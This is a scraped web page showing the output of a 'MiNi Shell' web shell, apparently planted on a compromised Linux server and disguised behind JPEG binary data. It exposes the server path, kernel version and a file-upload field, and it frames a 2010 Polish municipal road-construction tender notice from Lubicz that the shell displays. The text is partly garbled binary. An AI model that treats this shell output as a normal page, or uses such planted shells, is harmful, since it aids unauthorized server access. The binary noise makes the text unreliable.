JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100914/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100914/251229-N-2010.html

<p class="kh_header"><b>Lubicz: Wykonanie robót budowlanych budowy i rozbudowy dróg gminnych publicznych wraz z zapewnieniem finansowania wykonanych prac do roku 2017.</b><br>
<b>Numer ogłoszenia: 251229 - 2010; data zamieszczenia: 14.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg, Gospodarki Mieszkaniowej i Komunalnej w Lubiczu , ul. Toruńska 36A, 87-162 Lubicz, woj. kujawsko-pomorskie, tel. 0-56 6782709, faks 0-56 6782709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych budowy i rozbudowy dróg gminnych publicznych wraz z zapewnieniem finansowania wykonanych prac do roku 2017..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych budowy i rozbudowy dróg 	gminnych publicznych, zgodnie z poniższym zestawieniem wg opracowanych uproszczonych 	projektów budowlanych wraz z zapewnieniem finansowania wykonanych prac do roku 2017.
	Wykonawca zrealizuje roboty budowlane przy użyciu własnego sprzętu, materiałów i robocizny. 
	Wykonawca zabezpieczy we własnym zakresie obsługę geodezyjną zarówno przed 	rozpoczęciem robót (wytyczenie) jak i po ich zakończeniu (inwentaryzacja 	powykonawcza).
	Wszystkie zastosowane materiały do realizacji przedmiotu zamówienia muszą 	posiadać atesty, 	zgodnie z ustawą z dnia 16.04.204 r. o wyrobach budowlanych (Dz. U. z 2004 r. Nr 92, poz. 881 	ze zmianami) oraz ustawy z dnia 07.07.1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 	1118 ze zmianami).
	3.1. Droga gminna nr 100714C  ul. Nad Strugą w Grębocinie o istniejącej nawierzchni  jezdni 
		z tłucznia kamienia łamanego i pospółki drogowej od km 0 + 380 do km  0 + 840 o szerokości 		5,0 m i powierzchni ze zjazdami  2346,50m2 .- powierzchniowe utrwalenie jezdni przez  				dwukrotny sprysk emulsją kationową  K1/70 z posypaniem grysami twardymi na podbudowie 		z kruszywa asfaltowego z recyklingu sortowanego przez wykonawcę, przekazanego przez 				Zamawiającego do sortowania i wbudowania . Utwardzenie poboczy  szerokości  2x0,60m 
		o powierzchni 552,00 m2
	3.2. Droga gminna nr 100715C ul. Wiatraczna  w Grębocinie o istniejącej nawierzchni  jezdni 
		z tłucznia kamienia łamanego i pospółki drogowej od km 0 + 000 do km  0 + 350 o szerokości 		5,0 m i powierzchni ze zjazdami  1861,00m2 .- powierzchniowe utrwalenie jezdni przez  				dwukrotny sprysk emulsją kationową  K1/70 z posypaniem grysami twardymi na podbudowie 		z kruszywa asfaltowego z recyklingu sortowanego przez wykonawcę, przekazanego przez 				Zamawiającego do sortowania i wbudowania . Utwardzenie poboczy o szerokości  2x0,60m 
		o powierzchni 420,00 m2
	3.3. Droga gminna nr 100716C ul. Piękna w Grębocinie o istniejącej nawierzchni  jezdni z 				tłucznia kamienia łamanego i pospółki drogowej od km 0 + 000 do km  0 + 200 o szerokości 			3,5 m i powierzchni ze zjazdami  700,00m2 .- powierzchniowe utrwalenie jezdni przez  					dwukrotny sprysk emulsją kationową  K1/70 z posypaniem grysami twardymi na podbudowie 		z 	kruszywa asfaltowego z recyklingu sortowanego przez wykonawcę, przekazanego przez 			Zamawiającego do sortowania i wbudowania . Utwardzenie poboczy o szerokości  2x0,60m 
		o powierzchni 240,00 m2
	3.4. Droga gminna nr 100836C ul. Sosnowa  w Złotorii o istniejącej nawierzchni  jezdni z 				tłucznia 	kamienia łamanego i pospółki drogowej od km 0 + 000 do km  0 + 200 o szerokości 			5,0 m i powierzchni ze zjazdami na dr  na dz. nr 194/4 i na dr. ul. Piaskowej  1168,75m2 .- 				powierzchniowe utrwalenie jezdni przez  dwukrotny sprysk emulsją kationową  K1/70 z 				posypaniem grysami twardymi na podbudowie z kruszywa asfaltowego z recyklingu 						sortowanego przez wykonawcę, przekazanego przez Zamawiającego do sortowania i 						wbudowania . Utwardzenie poboczy o szerokości  2 x 0,60 m o powierzchni 288,00 m2
3.5.	 Droga gminna nr 100765C ul. Długa w Krobi o istniejącej nawierzchni  jezdni z tłucznia kamienia łamanego i pospółki drogowej od km 0 + 000 do km  0 + 683 o szerokości 5,0 m 
i powierzchni ze zjazdami w istniejące drogi  4523,00m2 .- powierzchniowe utrwalenie jezdni przez  dwukrotny sprysk emulsją kationową  K1/70 z posypaniem grysami twardymi na podbudowie z kruszywa asfaltowego z recyklingu sortowanego przez wykonawcę, przekazanego przez Zamawiającego do sortowania i wbudowania .Utwardzenie poboczy 
o szerokości  2 x 0,60 m o powierzchni 975,60 m2
3.6.	 Droga gminna nr 100777C ul. Klonowa w Lubiczu Dolnym o istniejącej nawierzchni  jezdni z tłucznia kamienia łamanego i pospółki drogowej od km 0 + 000 do km  0 + 184 
o szerokości 5,0 m i powierzchni  920,00 m2 .- wykonanie nawierzchni jezdni z masy mineralno bitumicznej  grysowej w jednej warstwie o grubości 6cm na podbudowie 
z kruszywa asfaltowego z recyklingu sortowanego przez wykonawcę, przekazanego przez Zamawiającego do sortowania i wbudowania. Utwardzenie poboczy z jednej strony  
o szerokości 0,60m i powierzchni 92,00 m2 Odwodnienie jezdni jednostronne za pomocą korytek ściekowych betonowych  o wym. 50x30x15cm na długości 189,0 m
3.7.	 Droga gminna nr 100778C ul. Jesionowa w Lubiczu Dolnym o istniejącej nawierzchni  jezdni z tłucznia kamienia łamanego i pospółki drogowej od km 0 + 000 do km  0 + 139 o szerokości 3,50m i powierzchni ze zjazdami  490,50 m2 .- wykonanie nawierzchni jezdni z masy mineralno bitumicznej  grysowej w jednej warstwie o grubości 6cm na podbudowie z kruszywa asfaltowego z recyklingu sortowanego przez wykonawcę, przekazanego przez Zamawiającego do sortowania i wbudowania. Utwardzenie poboczy o szerokości 2x0,50m i powierzchni 134,00 m2 .
3.8.	 Droga gminna nr 100812C ul. Parkowa w Lubiczu Górnym o istniejącej nawierzchni  jezdni z tłucznia kamienia łamanego i pospółki drogowej od km 0 + 000 do km  0 + 127 o szerokości 5,0m od km 0+135 do km 0+227 po szer.4,0m i  powierzchni ze zjazdami  1046,000 m2 .- wykonanie nawierzchni jezdni z masy mineralno bitumicznej  grysowej w jednej warstwie o grubości 6cm na podbudowie z kruszywa asfaltowego z recyklingu sortowanego przez wykonawcę, przekazanego przez Zamawiającego do sortowania i wbudowania. Utwardzenie poboczy o szerokości 2x0,50m i powierzchni 219,00 m2 .
3.9.	  Droga gminna nr 100739C  w Gronowie o istniejącej nawierzchni  jezdni z tłucznia kamienia wapiennego łamanego od km 0 + 000 przy drodze gminnej Nr 100741C do km  0 + 925 przy drodze  Nr 100745C o szerokości 3,5m i powierzchni z zjazdami  3441,25 m2 .- powierzchniowe utrwalenie jezdni przez  trzykrotny sprysk emulsją kationową  K1/70 z posypaniem grysami twardymi. Utwardzenie poboczy o szerokości 2x1,00m i powierzchni 925,00 m2 .
3.10.	Budowa drogi  gminnej na dz. nr 232/14 i 232/5 w Gronówku obręb Gronowo od km 
0 + 000 przy drodze powiat. nr 2030 do km  0 + 474 o szerokości 5,0m i pow. jezdni ze zjazdami 2565,0 m2
		- 	wykonanie warstwy odsączającej z piasku o grubości 40cm po zagęszczeniu na pow. 
			3835,00 m2 ,
		-	wykonanie warstwy dolnej podbudowy z gruzu betonowego o grubości  po zagęszczeniu 				20 cm o powierzchni 2697,00 m2 ,
	- 	wykonanie warstwy górnej podbudowy grubości po zagęszczeniu 6cm z kruszywa asfaltowego 
		z recyklingu sortowanego przez wykonawcę, przekazanego przez Zamawiającego do 						sortowania, 
	- wykonanie powierzchniowego utrwalenie jezdni o powierzchni 1869,0 m2 przez dwukrotny 
		sprysk emulsją kationową  K1/70 z posypaniem grysami twardymi,
	- ułożenie warstwy wiążącej  gr. 4 cm z masy mineralno-bitumicznej  grysowej o pow. 696,0 m2,
	- ułożenie warstwy ścieralnej  gr. 4 cm z masy mineralno-bitumicznej  grysowej o pow. 
		696,0 m2,
	- utwardzenie poboczy o szerokości 2 x 0,500 m i powierzchni 366,8 m2 .
	3.11. Szczegółowe określenie przedmiotu zamówienia zostało ujęte w załączniku Nr 2 do SIWZ 
			Projekty budowlane oraz w załączniku Nr 3 do SIWZ - kosztorysy.
	3.12. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom.
	3.13. Wymagania dotyczące zapewnienia finansowania wykonanych prac do 2017 roku.
	3.13.1. 	W zakresie obejmującym zapewnienie finansowania do końca roku 2017.
				Wykonawca zapewni możliwość zapłaty przez Zamawiającego kwoty wynikającej 
				z zaakceptowanych przez Zamawiającego faktur przejściowych i faktury końcowej 						(wraz z protokołami odbioru robót) obejmujących wartość przedmiotu zamówienia 						wraz z należnym podatkiem VAT na podstawie cesji wierzytelności na rzecz banku na 					zasadach określonych w pkt  3.13.2-3.13.4.
	3.13.2. 	Wykonawca zobowiązuje się, że najpóźniej do czasu rozpoczęcia robót, zawrze z 							bankiem działającym na podstawie i w oparciu o przepisy ustawy z dnia 29 sierpnia 						1997 r. Prawo bankowe (Dz. U. z 2002 r. , Nr 72, poz. 665 ze zmianami) umowę 							sprzedaży wierzytelności wynikającej z niniejszej umowy stanowiącej równowartość 					wykonanych robót, dostawy i montażu wyposażenia (Wynagrodzenie Ryczałtowe) wraz 				z należnym podatkiem VAT, a bank wierzytelność tę nabędzie.
	3.13.3..	Umowa wykupu wierzytelności, o jakiej mowa w pkt 3.13.2. zawierać będzie 								zobowiązanie banku do wykupu wierzytelności określające maksymalną wysokość, 						zasady i warunki spłaty tych wierzytelności oraz zapewni Wykonawcy uzyskanie z 						banku zapłaty kwoty odpowiadającej kwotom z wystawianych faktur przejściowych i 					faktury końcowej w nieprzekraczalnym terminie 30 dni od daty wystawienia i 								zaakceptowania faktur przez Zamawiającego.
	3.13.4. 	Wykonawca zobowiązuje się do spełnienia wszelkich warunków określonych przez bank 
				w zawartej umowie wykupu wierzytelności tak, by terminy zapłaty określone w pkt 						3.13.3. mogły być dotrzymane.
	3.13.5.	Spłata wykupionej przez bank wierzytelności realizowana będzie przez 										Zamawiającego w wartości wynikającej z wystawionych i przedstawionych w banku 	do 				wykupu faktur w 60 miesięcznych  ratach kapitałowych począwszy od dnia 31 stycznia 					2013 r. do dnia 31 grudnia 2017 r., przy czym w latach 2013 i 2014 raty wynosić będą 					po 10.000 zł. , a w latach 2015-2017 - 36 równych rat, których wysokość wynikać 						będzie z podzielenia pozostałego do spłaty zobowiązania przez 36.
	3.13.6. 	Od kwoty aktualnego salda wierzytelności (ustalonego w oparciu o zaakceptowane 						przez Zamawiającego faktury i pomniejszone o dokonane spłaty kapitałowe) bank 						pobierze odsetki naliczane w stosunku rocznym (dla roku równego 365/366 dni i 							rzeczywistej liczby dni w każdym miesiącu) wg zmiennej stopy procentowej ustalonej 					na bazie WIBOR 1M i stałej marży banku, w wysokości podanej w 	ofercie Wykonawcy 				w punktach procentowych w stosunku rocznym.
	3.13.7. 	Zmiana stawki WIBOR 1 M dokonywana będzie na zasadach i w terminach 									obowiązujących w banku, który nabędzie wierzytelność.
	3.13.8.	Spłata odsetek, o jakich mowa w pkt 3.13.5. i 3.13.6. dokonywana będzie przez 							Zamawiającego w okresach miesięcznych  w terminach zgodnych z terminem spłaty 	rat 				kapitałowych, a w okresie karencji na ostatni dzień miesiąca. Pierwsze odsetki od 							wykupionych wierzytelności płatne będą łącznie z odsetkami za miesiąc styczeń 2011 .
	3.13.9.	Bank najpóźniej na 7 dni roboczych przed terminem spłaty raty kapitałowo - 								odsetkowej będzie przekazywał Zamawiającemu (dłużnikowi) informację o wysokości 					spłaty wierzytelności (rata kapitałowa i odsetki).
	3.13.10.	W przypadku niedotrzymania przez Zamawiającego (dłużnika) terminu zapłaty, o 	jakim 				mowa w pkt 3.13.5 i 3.13.8, bank ma prawo do naliczania odsetek od salda zadłużenia 					przeterminowanego w wysokości i na zasadach obowiązujących w banku.
	3.13.11.	Zamawiający zobowiązuje się, że uzna dług związany ze sprzedażą wierzytelności do 					wysokości zafakturowanych robót (na podstawie zaakceptowanych przez 										Zamawiającego faktur przejściowych i faktury końcowej) i do dokonania na rzecz banku 				zapłaty wynikającego z nich zobowiązania w równych 60 miesięcznych  ratach 							kapitałowych powiększonych o odsetki należne bankowi, zgodnie z treścią pkt 3.13.1. 					do	3.13.9.
	3.13.12.	Na żądanie banku dokonującego wykupu wierzytelności Zamawiający każdorazowo:
a)	przedstawi kartę wzorów podpisów osób upoważnionych do reprezentowania 	Zamawiającego i akceptacji faktur, 
b)	potwierdzi wystawione przez bank zawiadomienie o przelewie wierzytelności 
		z 	przedmiotowej umowy podpisanej przez Zamawiającego z Wykonawcą, 
c)	złoży oświadczenie o zaakceptowaniu harmonogramu spłaty wierzytelności 	określonego w umowie sprzedaży wierzytelności podpisanej przez 	Wykonawcę z bankiem oraz 
o przyjęciu do wiadomości i stosowania 	postanowień zawartych w tej umowie 
d)	udostępni dane pozwalające na ocenę jego sytuacji finansowej.
	3.13.13.	Spłata przez Zamawiającego wierzytelności w kwotach i terminach wynikających 
				z postanowień umowy sprzedaży wierzytelności podpisanej przez Wykonawcę 	z 							bankiem zaspokoi w całości roszczenia Wykonawcy w stosunku do Zamawiającego.
	3.13.14.	Niedokonanie przez Wykonawcę sprzedaży wierzytelności i niedostarczenie 								Zamawiającemu kopii umowy z bankiem w terminie wskazanym w § 3 ust. 2 wzoru 						umowy, Zamawiający będzie traktował jak odstąpienie od realizacji umowy z 	przyczyn 				leżących po stronie Wykonawcy. Tym samym Zamawiający będzie 	uprawniony do 					żądania odszkodowania i kary umownej na zasadach określonych w § 	11 ust. 1 lit. c) 					wzoru umowy.
	3.13.15.	Zamawiający będzie miał możliwość dokonania wcześniejszej spłaty części lub całej 						kwoty zadłużenia przed terminem ostatecznej spłaty, a odsetki będą pobierane 								wyłącznie od faktycznego salda zadłużenia  Zamawiającego w  okresie odsetkowym.
	3.13.16.	Skrócenie spłaty zobowiązania nie spowoduje naliczania dodatkowych opłat lub 							prowizji banku.
	3.13.17.	Oprocentowanie, według którego naliczane będą odsetki, obliczane będzie w oparciu 
				o zmienną stawkę referencyjną WIBOR 1M powiększoną o stałą marżę ......... % w skali 				roku.
	3.13.18.	Jeżeli termin spłaty odsetek lub kapitału przypadać będzie na dzień ustawowo wolny od 					pracy, to termin spłaty ulegnie przesunięciu na następny dzień roboczy.
	3.13.19.	Zamawiający wyraża zgodę na wykup wierzytelności przez bank finansujący 								wykonawcę. 
	3.13.20.	Zamawiający zastrzega sobie nienaruszalność poniższych zasad spłaty wierzytelności 					przez cały okres spłaty:

		a) bank nie może żądać od Zamawiającego spłaty zobowiązania przed umówionym okresem 
	spłaty,
		b) spłata zobowiązania cały okres spłaty będzie realizowana na warunkach określonych  
	w ofercie wykonawcy,
c) wprowadzenie jakiejkolwiek zmiany systemu spłaty przez bank finansujący wykonawcę, 
	bez zgody Zamawiającego nie będzie obowiązujące..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.23-7, 66.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wysokość wadium Zamawiający ustalił na kwotę  40.000 zł. (słownie: czterdzieści  tysięcy 
		złotych.
2. Wadium należy wnosić na zasadach określonych w art. 45 ustawy Pzp.
3. Wadium wniesione w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego
w 	Banku Spółdzielczym w Grębocinie Nr  95 9491 0003 0000 0000 1212 0003.
4. Oferta wykonawcy, który nie wniesie wadium w wyznaczonym terminie, zgodnie z zasadami określonymi w ustawie Pzp zostanie odrzucona na podstawie 	przepisów ustawy  Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o prowadzeniu działalności gospodarczej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o posiadaniu niezbędnej wiedzy i doświadczenia oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia publicznego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz podstawowego sprzętu przewidzianego  do realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób przewidzianych do realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy  dopuszczalna jest w sytuacji  gdy wynika to z okolicznwości, których nie można było przewidzieć w chwili zawarcia umowy, lub gdy zmiany  te są korzystne dla zamawiającego. W szczególności  zamawiający  dopuszcza  możliwość zmiany terminu wykonania umowy, gdy warunki atmosferyczne uniemożliwiają jej terminowe wykonanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Gospodarki Mieszkaniowej i Komunalnej w Lubiczu 
	ul. Toruńska 36a, 87 - 162 Lubicz 	pokój  Nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2010 godzina 10:00, miejsce: Zarząd Dróg Gospodarki Mieszkaniowej i Komunalnej w Lubiczu 
	ul. Toruńska 36a, 87 - 162 Lubicz 	pokój  Nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com